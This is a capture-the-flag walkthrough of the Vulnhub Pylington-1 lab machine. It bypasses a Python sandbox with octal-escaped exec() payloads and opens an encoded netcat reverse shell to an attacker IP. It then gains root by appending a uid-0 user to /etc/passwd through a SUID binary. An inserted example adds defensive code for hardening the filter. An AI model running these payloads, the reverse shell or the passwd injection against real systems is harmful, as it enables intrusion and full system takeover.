Vulnhub Pylington: 1 Write-up!!

Hi, hope you are well and healthy. This is the write-up for the Pylington-1 vulnhub machine.

If you want to solve this machine you can download it from here.

Vulnhub Pylington-1

Let's begin by finding all open ports on the machine using nmap.

nmap: finding open ports

Now let's find the services and their versions on ports 22 and 80.

Service version

When we visit port 80, the page below opens in the browser. As we can see from the nmap output, there are 3 disallowed entries in robots.txt.

port 80

Robots.txt entries:

robots.txt

When I tried to visit the /register page, I got the message that currently we are unable to register.

/register

Then I visited "/zbir7mn240soxhicso2z" and got a username and password.

When I logged in, I got redirected to the page below.

As it says, it is a Super Secret Python IDE, and it also mentions that it uses a sandbox. Just to test the IDE, I used a print statement, which worked with no issues. Then I used __import__('os').system('ls -la') and got the message below.

Then I searched for "NoImportOS sandbox code execution bypass" and got the result below.

I used the payload below:

Payload with the string written as octal escape sequences:

exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")

Input:

Output:
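The bypass works because the sandbox only inspects the raw source text, while Python decodes the escape sequences at parse time. The following is an added example, not code from the write-up or from the Pylington machine: a constructed denylist filter in the spirit of "NoImportOS" (the real sandbox's implementation is not shown on the page), a naive substring check that the escaped payload slips past, and a hardened check that parses the snippet with `ast`, refuses exec/eval/compile, and applies the denylist to the decoded value of every string literal.

```python
import ast

# Constructed denylist in the spirit of the page's "NoImportOS" sandbox
# (the real sandbox's implementation is not shown in the write-up).
DENYLIST = ("import", "os")

# Constructed samples: PLAIN is the direct call the sandbox rejected,
# ESCAPED is the same code with every character of the string written as
# an octal escape sequence, wrapped in exec(), as in the write-up.
PLAIN = "__import__('os').system('ls')"
ESCAPED = (r'exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163'
           r'\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")')


def naive_filter_blocks(src: str) -> bool:
    """Substring check on the raw source text: the weak approach."""
    return any(tok in src for tok in DENYLIST)


def decoded_string_literals(src: str) -> list:
    """Return every string literal in src with its escape sequences decoded."""
    tree = ast.parse(src)
    return [node.value for node in ast.walk(tree)
            if isinstance(node, ast.Constant) and isinstance(node.value, str)]


def hardened_filter_blocks(src: str) -> bool:
    """Check the raw text, refuse dynamic code execution, and apply the
    denylist to the decoded value of every string literal."""
    if naive_filter_blocks(src):
        return True
    try:
        tree = ast.parse(src)
    except SyntaxError:
        return True  # anything the parser rejects is refused
    for node in ast.walk(tree):
        # exec/eval/compile turn a decoded string into code at runtime
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in {"exec", "eval", "compile"}):
            return True
        if (isinstance(node, ast.Constant) and isinstance(node.value, str)
                and any(tok in node.value for tok in DENYLIST)):
            return True
    return False


if __name__ == "__main__":
    for label, src in (("plain", PLAIN), ("escaped", ESCAPED)):
        print(f"{label:8s} naive={naive_filter_blocks(src)!s:5s} "
              f"hardened={hardened_filter_blocks(src)}")
```

Run it and the naive check reports the escaped payload as clean while the hardened check rejects both forms; a real fix is to stop filtering source text altogether and run untrusted code in an isolated process or container.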

We have code execution, so I used nc to get a reverse shell.

Final Payload:

exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\57\165\163\162\57\142\151\156\57\156\143\40\55\145\40\57\142\151\156\57\142\141\163\150\40\61\71\62\56\61\66\70\56\71\56\63\40\64\64\63\47\51\12")

I started a netcat listener on port 443 on the attacking machine, executed the above payload, and got a reverse shell.

As we can see, there is a file named "typing" with the SUID bit set.

Road to user py:

I executed the "typing" file and got the password for user py.

Using the above username and password, I SSHed into the box.

user flag

In the py home directory there is a directory called secret_stuff which has a couple of files. The backup binary has the SUID bit set and runs with root permissions.

Source code for backup.

The backup binary appends a line to a file in the directory /srv/backups/. If we want to become root, we can add a user with root permissions to the /etc/passwd file, but the source says the target file should be in /srv/backups/.

Let's first create a password hash for the username using openssl.

Both the username and password are rootit.

We need to append the line below to the /etc/passwd file:

rootit:A01LlfJ378prI:0:0:/root/root:/bin/bash

We are able to append the line to /etc/passwd.

Let's try to log in with it. We are now root on the box.

root flag.

Hope you like the write-up… stay home, stay safe.